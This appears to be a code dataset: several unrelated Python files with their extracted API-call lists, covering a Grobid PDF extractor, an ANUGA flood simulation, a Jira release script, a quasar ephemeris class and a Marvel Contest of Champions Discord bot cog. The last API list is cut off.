import re
import os
# Returns full TEI xml document of the PDF
class GrobidTEIExtractor(interfaces.FullTextTEIExtractor):
    """Runs Grobid's full-text service and stores the complete TEI document."""
    dependencies = frozenset([filters.AcademicPaperFilter])
    result_file_name = '.tei'

    def extract(self, data, dep_results):
        """Send the PDF bytes to Grobid and wrap the resulting TEI tree."""
        tei_xml = _call_grobid_method(data, 'processFulltextDocument')
        return ExtractorResult(xml_result=tei_xml)
# Returns TEI xml document only of the PDF's header info
class GrobidHeaderTEIExtractor(interfaces.HeaderTEIExtractor):
    """Runs Grobid's header service and stores header-only TEI metadata."""
    dependencies = frozenset([filters.AcademicPaperFilter])
    result_file_name = '.header.tei'

    def extract(self, data, dep_results):
        """Ask Grobid for header-only TEI and wrap it for the framework."""
        return ExtractorResult(
            xml_result=_call_grobid_method(data, 'processHeaderDocument'))
class GrobidCitationTEIExtractor(Extractor):
    """Runs Grobid's reference parser and stores the citation TEI."""
    dependencies = frozenset([filters.AcademicPaperFilter])
    result_file_name = '.cite.tei'

    def extract(self, data, dep_results):
        """Extract bibliographic references from the PDF via Grobid."""
        citations = _call_grobid_method(data, 'processReferences')
        return ExtractorResult(xml_result=citations)
def _call_grobid_method(data, method):
    """POST *data* (raw PDF bytes) to the given Grobid REST *method*.

    :param data: PDF file contents
    :param method: Grobid method name, e.g. 'processFulltextDocument'
    :return: parsed TEI as an ElementTree element, with the default
             namespace stripped for easier downstream parsing
    :raises RunnableError: when the server is unreachable or answers non-200
    """
    url = '{0}/api/{1}'.format(config.GROBID_HOST, method)

    # Write the pdf data to a temporary location so Grobid can process it
    path = extraction.utils.temp_file(data, suffix='.pdf')

    try:
        # BUG FIX: the file handle passed to requests was never closed;
        # the with-block guarantees it is.
        with open(path, 'rb') as pdf_handle:
            files = {'input': (path, pdf_handle)}
            try:
                resp = requests.post(url, files=files)
            except requests.exceptions.RequestException:
                raise RunnableError('Request to Grobid server failed')
    finally:
        os.remove(path)

    if resp.status_code != 200:
        raise RunnableError('Grobid returned status {0} instead of 200\nPossible Error:\n{1}'.format(resp.status_code, resp.text))

    # Remove all namespace info from the xml string; hacky but makes parsing
    # much easier down the road.  BUG FIX: use resp.text (str) rather than
    # resp.content (bytes) so the str pattern works under Python 3 too.
    xmlstring = re.sub(' xmlns="[^"]+"', '', resp.text, count=1)
    xml = safeET.fromstring(xmlstring)

    return xml
| [
"requests.post",
"extraction.runnables.RunnableError",
"extraction.runnables.ExtractorResult",
"defusedxml.ElementTree.fromstring",
"re.sub",
"os.remove"
] | [((2384, 2435), 're.sub', 're.sub', (['""" xmlns="[^"]+\\""""', '""""""', 'resp.content'], {'count': '(1)'}), '(\' xmlns="[^"]+"\', \'\', resp.content, count=1)\n', (2390, 2435), False, 'import re\n'), ((2448, 2476), 'defusedxml.ElementTree.fromstring', 'safeET.fromstring', (['xmlstring'], {}), '(xmlstring)\n', (2465, 2476), True, 'import defusedxml.ElementTree as safeET\n'), ((719, 750), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (734, 750), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1085, 1116), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (1100, 1116), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1370, 1401), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (1385, 1401), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1729, 1760), 'requests.post', 'requests.post', (['url'], {'files': 'files'}), '(url, files=files)\n', (1742, 1760), False, 'import requests\n'), ((1906, 1921), 'os.remove', 'os.remove', (['path'], {}), '(path)\n', (1915, 1921), False, 'import os\n'), ((1833, 1881), 'extraction.runnables.RunnableError', 'RunnableError', (['"""Request to Grobid server failed"""'], {}), "('Request to Grobid server failed')\n", (1846, 1881), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n')] |
#------------------------------------------------------------------------------
# IMPORT NECESSARY MODULES
#------------------------------------------------------------------------------
print (' ABOUT to Start Simulation:- Importing Modules')
import anuga, anuga.parallel, numpy, time, os, glob
from anuga.operators.rate_operators import Polygonal_rate_operator
from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator
import anuga.utilities.spatialInputUtil as su
from anuga import distribute, myid, numprocs, finalize, barrier
from anuga.parallel.parallel_operator_factory import Inlet_operator, Boyd_box_operator, Boyd_pipe_operator
from anuga import Rate_operator
#------------------------------------------------------------------------------
# FILENAMES, MODEL DOMAIN and VARIABLES
#------------------------------------------------------------------------------
basename = 'terrain'     # stem of the input elevation file ('terrain.csv')
outname = 'boyd_pipe'    # stem of the simulation output (.sww) file
meshname = 'terrain.msh'
# Model extents -- presumably projected (UTM) easting/northing in metres;
# TODO confirm the coordinate system against the elevation data.
W=296600.
N=6180070.
E=296730.
S=6179960.
#------------------------------------------------------------------------------
# CREATING MESH
#------------------------------------------------------------------------------
# Rectangular boundary, each side tagged so boundary conditions can be
# attached by name further down.
bounding_polygon = [[W, S], [E, S], [E, N], [W, N]]
create_mesh_from_regions(bounding_polygon,
    boundary_tags={'south': [0], 'east': [1], 'north': [2], 'west': [3]},
    maximum_triangle_area=1.0,
    filename=meshname,
    use_cache=False,
    verbose=True)
#------------------------------------------------------------------------------
# SETUP COMPUTATIONAL DOMAIN
#------------------------------------------------------------------------------
domain = Domain(meshname, use_cache=False, verbose=True)
# Drop sub-0.1 mm water depths from the output to keep the .sww file small.
domain.set_minimum_storable_height(0.0001)
domain.set_name(outname)
print (domain.statistics())
#------------------------------------------------------------------------------
# APPLY MANNING'S ROUGHNESSES
#------------------------------------------------------------------------------
# Uniform Manning's n; elevation is interpolated from the terrain csv
# (alpha controls the fit smoothing).
domain.set_quantity('friction', 0.035)
domain.set_quantity('elevation', filename=basename+'.csv', use_cache=False, verbose=True, alpha=0.1)
#------------------------------------------------------------------------------
# BOYD PIPE CULVERT
#------------------------------------------------------------------------------
# Energy-loss coefficients for the culvert hydraulics.
losses = {'inlet':0.5, 'outlet':1.0, 'bend':0.0, 'grate':0.0, 'pier': 0.0, 'other': 0.0}
# Culvert end points (inlet/outlet) and their invert levels in metres.
ep0 = numpy.array([296660.390,6180017.186])
ep1 = numpy.array([296649.976,6180038.872])
invert_elevations=[12.40,12.20]
culvert = Boyd_pipe_operator(domain,
    losses=losses,
    diameter=1.0,
    end_points=[ep0, ep1],
    invert_elevations=invert_elevations,
    use_momentum_jet=False,
    use_velocity_head=False,
    manning=0.013,
    logging=True,
    label='boyd_pipe',
    verbose=False)
#------------------------------------------------------------------------------
# APPLY FLOW
#------------------------------------------------------------------------------
# Constant inflow of 1.0 m^3/s distributed across the line below.
line=[[296669.258,6179974.191],[296677.321,6179976.449]]
anuga.parallel.Inlet_operator(domain, line, 1.0)
#------------------------------------------------------------------------------
# SETUP BOUNDARY CONDITIONS
#------------------------------------------------------------------------------
print ('Available boundary tags', domain.get_boundary_tags())
Br = anuga.Reflective_boundary(domain)   # solid wall
Bd = anuga.Dirichlet_boundary([0,0,0])   # fixed stage/momentum
domain.set_boundary({'west': Bd, 'south': Br, 'north': Bd, 'east': Bd})
#------------------------------------------------------------------------------
# EVOLVE SYSTEM THROUGH TIME
#------------------------------------------------------------------------------
# FIX: the redundant `import time` that used to live here was removed --
# `time` is already imported at the top of the file.
t0 = time.time()
for t in domain.evolve(yieldstep = 1, finaltime = 4000):
    print (domain.timestepping_statistics())
    print (domain.boundary_statistics(quantities='stage'))
print ('Finished')
| [
"anuga.Domain",
"anuga.Reflective_boundary",
"anuga.parallel.parallel_operator_factory.Boyd_pipe_operator",
"numpy.array",
"anuga.parallel.Inlet_operator",
"anuga.create_mesh_from_regions",
"time.time",
"anuga.Dirichlet_boundary"
] | [((1311, 1508), 'anuga.create_mesh_from_regions', 'create_mesh_from_regions', (['bounding_polygon'], {'boundary_tags': "{'south': [0], 'east': [1], 'north': [2], 'west': [3]}", 'maximum_triangle_area': '(1.0)', 'filename': 'meshname', 'use_cache': '(False)', 'verbose': '(True)'}), "(bounding_polygon, boundary_tags={'south': [0],\n 'east': [1], 'north': [2], 'west': [3]}, maximum_triangle_area=1.0,\n filename=meshname, use_cache=False, verbose=True)\n", (1335, 1508), False, 'from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator\n'), ((1733, 1780), 'anuga.Domain', 'Domain', (['meshname'], {'use_cache': '(False)', 'verbose': '(True)'}), '(meshname, use_cache=False, verbose=True)\n', (1739, 1780), False, 'from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator\n'), ((2507, 2544), 'numpy.array', 'numpy.array', (['[296660.39, 6180017.186]'], {}), '([296660.39, 6180017.186])\n', (2518, 2544), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((2553, 2591), 'numpy.array', 'numpy.array', (['[296649.976, 6180038.872]'], {}), '([296649.976, 6180038.872])\n', (2564, 2591), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((2651, 2890), 'anuga.parallel.parallel_operator_factory.Boyd_pipe_operator', 'Boyd_pipe_operator', (['domain'], {'losses': 'losses', 'diameter': '(1.0)', 'end_points': '[ep0, ep1]', 'invert_elevations': 'invert_elevations', 'use_momentum_jet': '(False)', 'use_velocity_head': '(False)', 'manning': '(0.013)', 'logging': '(True)', 'label': '"""boyd_pipe"""', 'verbose': '(False)'}), "(domain, losses=losses, diameter=1.0, end_points=[ep0,\n ep1], invert_elevations=invert_elevations, use_momentum_jet=False,\n use_velocity_head=False, manning=0.013, logging=True, label='boyd_pipe',\n verbose=False)\n", (2669, 2890), False, 'from anuga.parallel.parallel_operator_factory import Inlet_operator, Boyd_box_operator, 
Boyd_pipe_operator\n'), ((3173, 3221), 'anuga.parallel.Inlet_operator', 'anuga.parallel.Inlet_operator', (['domain', 'line', '(1.0)'], {}), '(domain, line, 1.0)\n', (3202, 3221), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3488, 3521), 'anuga.Reflective_boundary', 'anuga.Reflective_boundary', (['domain'], {}), '(domain)\n', (3513, 3521), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3528, 3563), 'anuga.Dirichlet_boundary', 'anuga.Dirichlet_boundary', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (3552, 3563), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3856, 3867), 'time.time', 'time.time', ([], {}), '()\n', (3865, 3867), False, 'import time\n')] |
#!/usr/bin/env python
import os
import requests
from datetime import datetime

# Read the required configuration from the environment.
jira_version_name = os.getenv('JIRA_VERSION_NAME')
jira_project = os.getenv('JIRA_PROJ')
auth_user = os.getenv('JIRA_AUTH_USER')
auth_password = os.getenv('JIRA_AUTH_PASSWORD')

# Fail fast (exit code 2) when any required variable is missing; the
# messages are kept identical to the original script.
_required = [
    (jira_version_name, "Version Name Variable [JIRA_VERSION_NAME] is not defined."),
    (jira_project, "Jira Project Environment Variable [JIRA_PROJ] is not defined."),
    (auth_user, "Authentication User Environment Variable [JIRA_AUTH_USER] is not defined."),
    (auth_password, "Authentication Password Environment Variable [JIRA_AUTH_PASSWORD] is not defined."),
]
for _value, _message in _required:
    if _value is None:
        print(_message)
        exit(2)

# Optional settings with defaults.
jira_version_date = datetime.today().strftime('%d/%b/%Y')
jira_url = os.getenv('JIRA_URL', 'https://jira.org')
# The version is marked released unless JIRA_VERSION_RELEASED is exactly 'false'.
jira_version_release = os.getenv('JIRA_VERSION_RELEASED', 'true') != 'false'
jira_version_description = os.getenv('JIRA_VERSION_DESCRIPTION', 'Version {}'.format(jira_version_name))

print('Will Attempt to create version [{}] for project [{}] '.format(jira_version_name, jira_project))

jira_api_version = os.getenv('JIRA_API_VERSION', '2')
if jira_api_version == '2':
    data = {
        'description': jira_version_description,
        'name': jira_version_name,
        'userReleaseDate': jira_version_date,
        'project': jira_project,
        'released': jira_version_release
    }
    # Construct URL
    api_url = ('%(url)s/rest/api/2/version' % {'url': jira_url})
    print('Sending request to:')
    print(api_url)
    print('with body')
    print(data)
    response = requests.post(api_url, auth=(auth_user, auth_password), json=data)
    print('Response:')
    print(response)
    print(response.text)
else:
    # BUG FIX: an unsupported API version previously fell through to the
    # `if response:` check below with `response` undefined, raising NameError.
    print('Unsupported JIRA_API_VERSION [{}]; only "2" is supported.'.format(jira_api_version))
    exit(2)

# Exit 0 on HTTP success, 1 otherwise.
if response:
    exit(0)
else:
    exit(1)
| [
"datetime.datetime.today",
"requests.post",
"os.getenv"
] | [((99, 129), 'os.getenv', 'os.getenv', (['"""JIRA_VERSION_NAME"""'], {}), "('JIRA_VERSION_NAME')\n", (108, 129), False, 'import os\n'), ((145, 167), 'os.getenv', 'os.getenv', (['"""JIRA_PROJ"""'], {}), "('JIRA_PROJ')\n", (154, 167), False, 'import os\n'), ((180, 207), 'os.getenv', 'os.getenv', (['"""JIRA_AUTH_USER"""'], {}), "('JIRA_AUTH_USER')\n", (189, 207), False, 'import os\n'), ((224, 255), 'os.getenv', 'os.getenv', (['"""JIRA_AUTH_PASSWORD"""'], {}), "('JIRA_AUTH_PASSWORD')\n", (233, 255), False, 'import os\n'), ((818, 859), 'os.getenv', 'os.getenv', (['"""JIRA_URL"""', '"""https://jira.org"""'], {}), "('JIRA_URL', 'https://jira.org')\n", (827, 859), False, 'import os\n'), ((888, 930), 'os.getenv', 'os.getenv', (['"""JIRA_VERSION_RELEASED"""', '"""true"""'], {}), "('JIRA_VERSION_RELEASED', 'true')\n", (897, 930), False, 'import os\n'), ((1262, 1296), 'os.getenv', 'os.getenv', (['"""JIRA_API_VERSION"""', '"""2"""'], {}), "('JIRA_API_VERSION', '2')\n", (1271, 1296), False, 'import os\n'), ((1781, 1847), 'requests.post', 'requests.post', (['api_url'], {'auth': '(auth_user, auth_password)', 'json': 'data'}), '(api_url, auth=(auth_user, auth_password), json=data)\n', (1794, 1847), False, 'import requests\n'), ((768, 784), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (782, 784), False, 'from datetime import datetime\n')] |
import logging
import ephem
from . import Jnames, Bname_dict, cat_3C_dict, cal_dict, Bnames, EphemException
#from Astronomy.Ephem import EphemException
# Module-level logger; class loggers below are namespaced under it.
module_logger = logging.getLogger(__name__)
class Quasar(ephem.FixedBody):
  """
  ephem.FixedBody() with "J" or "B" name
  """
  def __init__(self,name):
    """
    Create an instance of a Quasar()

    The preferred name form is like 'J2305+4707'. However, 'B2303+46'
    is also exceptable, as is '2305+4707'. In the latter case, it must
    be a Julian epoch name.

    The name may also be given as "3C84" or "3C 84"

    Notes
    =====

    Instance methods and attributes
    -------------------------------
    flux     - radio flux in janskys at a specified frequency
    flux_ref - source for radio flux data
    freq     - frequency for which flux was calculated
    date     - date for which flux was calculated, if based on Michigan data
    Jname    - Julian epoch name
    Bname    - Besselian epoch name

    Inherited methods and attributes
    --------------------------------
    All methods and attributes of ephem.FixedBody()
    name - Julian epoch name without leading "J"
    """
    super(Quasar,self).__init__()
    self.logger = logging.getLogger(module_logger.name+".Quasar")
    # Normalise whichever naming scheme was given into name/Jname/Bname.
    if name[0] == "J":
      # NOTE(review): self.name is read here before being assigned below;
      # Jname was probably meant to be set from *name* -- confirm.
      self.Jname = self.name
      self.name = name[1:]
      try:
        self.Bname = "B"+Bnames[self.name]
      except KeyError:
        raise EphemException
    elif name[0] == "B":
      self.Bname = name
      try:
        self.name = Bname_dict[name[1:]]
      except KeyError:
        raise EphemException
      self.Jname = "J"+self.name
    elif name[:2] == "3C":
      # Accept both "3C 84" and "3C84" by stripping the space.
      name = name.replace(" ","")
      try:
        self.name = cat_3C_dict[name]
      except KeyError:
        raise EphemException
      self.Jname = "J"+self.name
      self.Bname = "B"+Bnames[self.name]
    else:
      # Bare Julian-epoch name: verify it exists in the catalog.
      try:
        Jnames.index("J"+name)
      except:
        # NOTE(review): bare except also swallows unrelated errors; a
        # ValueError catch would be more precise.
        raise EphemException
      self.name = name
      self.Jname = "J"+self.name
      self.Bname = "B"+Bnames[self.name]
    # Pull the catalog coordinates and configure the ephem body.
    quasar_data = cal_dict[self.name]
    self._ra = ephem.hours(str(quasar_data['ra']))
    self._dec = ephem.degrees(str(quasar_data['dec']))
    self.logger.debug("__init__: RA, dec.: %.3f, %.3f", self._ra, self._dec)
    self._epoch = ephem.J2000
    self._class = "Q"
    # to initialize ra, dec to something
    self.compute("2000/1/1 00:00:00")
    # Flux-related attributes, filled in by interpolate_flux().
    self.freq = None
    self.flux = None
    self.flux_ref = None
    self.date = None
    self.pressure = 0

  def interpolate_flux(self, freq, date=None):
    """
    Flux of source at given frequency in GHz.

    The Michigan data are interpolated if possible, that is, the source is
    in the data base and the frequency requested is between 4 and 15 GHz.
    Otherwise the VLA data are used.

    If the date is not given, it is assumed to be now.

    NOTE(review): this method references `datetime`, `michigan`, `date2num`
    and `vla_cal`, none of which are imported in this module's visible
    header -- confirm they are provided elsewhere or it will raise
    NameError at runtime.
    """
    self.freq = freq
    if self.freq > 4 and self.freq < 15:
      if date == None:
        self.date = datetime.datetime.now()
      else:
        self.date = date
      try:
        # in Michigan data
        michigan.Bnames.index(self.Bname[1:])
        self.flux = michigan.polate_flux(self.Bname[1:],
                                         date2num(self.date),
                                         freq)
        self.logger.debug("interpolate_flux: Michigan flux is %.3f", self.flux)
        self.flux_ref = "Michigan"
        return self.flux
      except ValueError:
        # Not in the Michigan catalog or no date given
        self.logger.debug("interpolate_flux: %s = %s is not in the Michigan catalog",
                          self.name, self.Bname)
    else:
      print("Outside Michigan frequency range")
    # try VLA cals
    try:
      cal_data = vla_cal.get_cal_data(self.Jname[1:])
      freqs,fluxes = vla_cal.get_flux_data(cal_data)
      self.flux = vla_cal.interpolate_flux(freqs,fluxes,freq)
      self.flux_ref = "VLA"
      self.logger.debug("interpolate_flux: %s flux is %.3f", self.flux_ref, self.flux)
      return self.flux
    except ValueError:
      # Not a VLA calibrator either: report "no flux known".
      self.flux = None
      self.flux_ref = None
      return None
| [
"logging.getLogger"
] | [((171, 198), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (188, 198), False, 'import logging\n'), ((1215, 1264), 'logging.getLogger', 'logging.getLogger', (["(module_logger.name + '.Quasar')"], {}), "(module_logger.name + '.Quasar')\n", (1232, 1264), False, 'import logging\n')] |
from redbot.core import commands, checks, Config
from redbot.core.utils import menus
import asyncio
import discord
import random
import logging
from .mdtembed import Embed
from .crystal import FEATUREDS, BCB
# Cog logger under Red's "red.demaratus" logging hierarchy.
log = logging.getLogger(name="red.demaratus.mcoc")
class Mcoc(commands.Cog):
"""Fun Games and Tools for Marvel Contest of Champions."""
__version__ = "1.3.1"
    def __init__(self, bot):
        self.bot = bot
        # Per-user Config storage; the identifier must stay fixed or
        # previously stored rosters become unreachable.
        self.config = Config.get_conf(
            self, identifier=153607829, force_registration=True
        )
        # Roster schema: one mapping per star tier, champion name -> sig level.
        self.config.register_user(
            roster={
                "5": {},
                "4": {},
                "3": {}
            }
        )
    async def red_delete_data_for_user(self, **kwargs):
        """Nothing to delete."""
        # NOTE(review): per-user roster data IS stored via Config; confirm
        # whether Red's data-deletion request should clear it here.
        return
    @commands.group()
    async def mcocsupport(self, ctx):
        """Cog support and information."""
        # Parent command group; the subcommands provide the functionality.
@mcocsupport.command()
async def version(self, ctx):
"""Version of the mcoc cog"""
embed = Embed.create(
self, ctx, title="Cog Version",
description="Current version: `{}`".format(self.__version__),
)
await ctx.send(embed=embed)
@commands.command()
@commands.cooldown(1, 60, commands.BucketType.user)
async def crystal(self, ctx):
"""Chooses a random champion."""
star = random.choice(['3', '4', '5'])
key, image = (random.choice(list(FEATUREDS.items())))
roster = await self.config.user(ctx.author).roster.get_raw()
await self.roster_logistics(ctx, star, key, roster)
data = Embed.create(
self, ctx, title='You got... <:crystal:776941489464672266>',
description="⭐" * int(star)
)
data.set_image(url=image)
await ctx.send(embed=data)
    @commands.group(invoke_without_command=True)
    async def roster(self, ctx):
        """Access your crystal rosters."""
        # Invoked without a subcommand: show the feature-availability legend.
        await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
@roster.command(name="5")
async def five(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send(_("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`"), delete_after=10)
if star is None:
star = "5"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("5")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
@roster.command(name="4")
async def four(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
if star is None:
star = "4"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("4")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
@roster.command(name="3")
async def three(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
if star is None:
star = "3"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("3")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"<error:777117297273077760> You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
    @commands.group()
    async def battlechip(self, ctx):
        """Opens a battlechip crystal from MCOC."""
        # Parent command group; `basic` and `uncollected` do the work.
@battlechip.command()
@commands.cooldown(1, 30, commands.BucketType.user)
async def basic(self, ctx):
"""Open a basic battlechip crystal."""
drop_rate = round(random.uniform(0, 100), 2)
if drop_rate < 0.02:
link = BCB[0]
title = "4 Star Punisher"
description = (
"This tier has a `0.02%` chance.\nCongratulations!\n"
"Message Kreusada#0518 with a screenshot to be added to the hall of fame!"
)
elif drop_rate < 0.65:
link = BCB[0]
title = "3 Star Punisher"
description = "This tier has a `0.65%` chance.\nCongratulations!"
elif drop_rate < 0.35:
link = BCB[1]
title = "Energy Refill"
description = "This tier has a `0.35%` chance.\nCongratulations!"
elif drop_rate < 2:
link = BCB[2]
title = "45 Units"
description = ""
elif drop_rate < 6:
link = BCB[2]
title = "15 Units"
description = ""
elif drop_rate < 30:
link = BCB[3]
title = "10,000 Gold"
description = ""
else:
link = BCB[3]
title = "2,500 Gold"
description = ""
data = Embed.create(self, ctx, title=title,
description=description, image=link)
await ctx.send(embed=data)
@battlechip.command()
async def uncollected(self, ctx):
"""Open an uncollected battlechip crystal."""
drop_rate = round(random.uniform(0, 100), 2)
if drop_rate < 0.02:
link = BCB[0]
title = "5 Star Punisher"
description = "This tier has a `0.02%` chance.\nCongratulations!"
elif drop_rate < 0.65:
link = BCB[0]
title = "4 Star Punisher"
description = "This tier has a `0.65%` chance.\nCongratulations!"
elif drop_rate < 0.35:
link = BCB[1]
title = "Five Energy Refills"
description = "This tier has a `0.35%` chance.\nCongratulations!"
elif drop_rate < 2:
link = BCB[2]
title = "225 Units"
description = ""
elif drop_rate < 6:
link = BCB[2]
title = "75 Units"
description = ""
elif drop_rate < 30:
link = BCB[3]
title = "50,000 Gold"
description = ""
elif drop_rate < 45:
link = BCB[3]
title = "25,000 Gold"
description = ""
else:
link = BCB[3]
title = "10,000 Gold"
description = ""
data = Embed.create(
self, ctx,
title="You got {}!".format(title), description="{}".format(description),
image=link
)
await ctx.send(embed=data)
async def roster_logistics(self, ctx: commands.Context, star: str, champion: str, roster: dict) -> None:
intstar = int(star)
if intstar <= 0 or intstar > 6:
intstar = 6
star = "6"
if intstar == 1 or intstar == 2:
sigs = 1
elif intstar == 3:
sigs = 8
else:
sigs = 20
try:
roster[star][champion] += sigs # Test
except KeyError:
roster[star][champion] = 0
await self.config.user(ctx.author).roster.set_raw(value=roster)
@commands.command()
async def awbadge(self, ctx, tier: str = None, group: int = None):
"""Get alliance war badges."""
if group is not None and group >= 1 and group < 4:
group_num = group - 1 # This is to make sure that it will work with the urls
tiers = {
"master": [
"https://media.discordapp.net/attachments/401476363707744257/738083791654092940/47EFB6D4D1380ABD2C40D2C7B0533A29245F7955.png",
"https://media.discordapp.net/attachments/401476363707744257/738083791113027654/650E29ADB8C5C382FF5A358113B2C02B8EADA415.png",
"https://media.discordapp.net/attachments/401476363707744257/738083791440052294/08BA0A081A9D56E35E60E3FD61FAB7ED9A10CD00.png"
],
"platinum": [
"https://media.discordapp.net/attachments/401476363707744257/738083790718631937/E78E2BAF9B0C9BA6C7FE45BE726FFB0B0B0CACFD.png",
"https://media.discordapp.net/attachments/401476363707744257/738083790362116116/487EA26A1BA0F2C2848E7C87F10430BD218C2178.png",
"https://media.discordapp.net/attachments/401476363707744257/738083790559117352/0ED8BD10441C6D086AEB7BBA5271269F46E009D1.png"
],
"gold": [
"https://media.discordapp.net/attachments/401476363707744257/738083790131298375/76BC21BF523A415866D19814BD8AF4BE16EF30A9.png",
"https://media.discordapp.net/attachments/401476363707744257/738083998462509096/8CD52FEB7540016B6ABA1EC67B9F1777E3C29878.png",
"https://media.discordapp.net/attachments/401476363707744257/738084001926873098/3A9A8FDA006D0BE225242AAA5909021CD52BCFB3.png"
],
"silver": [
"https://media.discordapp.net/attachments/401476363707744257/738084001465499789/4B389D377A94EDA747B38DF640C0B33A3A3F61AE.png",
"https://media.discordapp.net/attachments/401476363707744257/738084001465499789/4B389D377A94EDA747B38DF640C0B33A3A3F61AE.png",
"https://media.discordapp.net/attachments/401476363707744257/738083994612006914/5302FA8FA04735224847C8BBF82D1D54C8567B9C.png"
],
"bronze": [
"https://media.discordapp.net/attachments/401476363707744257/738083995211792404/719AC2C2AB5833D815C899DAF9ADB7CF11819CBA.png",
"https://media.discordapp.net/attachments/401476363707744257/738083993043337276/E636A90C3F0DFFDAED0176D972AA0C73F3E40FF8.png",
"https://media.discordapp.net/attachments/401476363707744257/738083997866786876/5B06D509847E0FA1405A50021486C1A5D8C6F9B2.png"
],
"stone": [
"https://media.discordapp.net/attachments/401476363707744257/738083996054978730/9AC92A2FDC2996C346125296356C664373147F2F.png",
"https://media.discordapp.net/attachments/401476363707744257/738083993681002586/BF3D13EACC9F44216E754884AA183185761C84CF.png",
"https://media.discordapp.net/attachments/401476363707744257/738084098857238670/EA938C0B0C2AE3E6DB91514F5F8768C4F033D373.png"
]
}
tier = tier.lower() if tier is not None else None
if tier is None or tier not in tiers:
embed = Embed.create(
self, ctx, title="Alliance War Badge Tiers",
description="Please choose one of the tiers below :arrow_down:\nSyntax: `,awbadge <tier>`"
)
normal = "\n".join([t.capitalize() for t in tiers.keys()])
embed.add_field(
# Unfortunatly I have to do this to make sure that participation gets in the list :/
name="Badges", value="{}\nParticipation".format(normal)
)
normal = "\n".join(tiers)
return await ctx.send(embed=embed)
if tier == "participation":
embed = Embed.create(
self, ctx, title="Participation",
image="https://media.discordapp.net/attachments/401476363707744257/738083790886535228/DA7D39277836A9CF1B39A68D37EAF99999B366C7.png"
)
return await ctx.send(embed=embed)
if group is None:
embeds = []
for i in range(3):
embed = Embed.create(
self, ctx,
title="{} Badges".format(tier.capitalize()), image=tiers[tier][i]
)
embeds.append(embed)
msg = await ctx.send(embed=embeds[0])
control = menus.DEFAULT_CONTROLS if len(embeds) > 1 else {
"\N{CROSS MARK}": menus.close_menu
}
asyncio.create_task(menus.menu(ctx, embeds, control, message=msg))
menus.start_adding_reactions(msg, control.keys())
else:
embed = Embed.create(
self, ctx,
title="{} Badge".format(tier.capitalize()), description="{} {}".format(tier.capitalize(), group),
image=tiers[tier][group_num]
)
await ctx.send(embed=embed)
| [
"logging.getLogger",
"redbot.core.utils.menus.menu",
"redbot.core.commands.cooldown",
"random.choice",
"random.uniform",
"redbot.core.Config.get_conf",
"redbot.core.commands.command",
"redbot.core.commands.group"
